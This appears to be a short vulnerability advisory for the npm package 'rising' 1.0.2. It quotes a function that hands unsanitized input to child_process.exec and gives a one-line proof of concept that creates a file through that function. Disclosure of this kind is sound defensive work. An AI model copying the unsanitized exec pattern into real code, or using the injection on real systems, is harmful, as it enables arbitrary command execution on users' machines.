Command injection vulnerability was identified in NPM package rising version 1.0.2
Resources:
- Project's NPM Package: https://www.npmjs.com/package/rising
- Project's NPM JS registery: https://registry.npmjs.org/rising
child_process
has been utilized in the plugin to execute the command. A user input has been used which is not being sanitized, which allows an attacker to perform command injection through rising package.
below is the code snippet that executes command without sanitizing it.
const child_process = require('child_process')
// other code
/**
* Execute a (shell) command.
*
* @param String cmd Your command.
*/
function execute(cmd) {
child_process.exec(cmd)
}
POC:
const rising = require('./index.js');
rising.println('Hello, world!');
rising.execute('touch pwn.txt');
Observer a new file pwn.txt will be created in the same directory.
Hassan Khan Yusufzai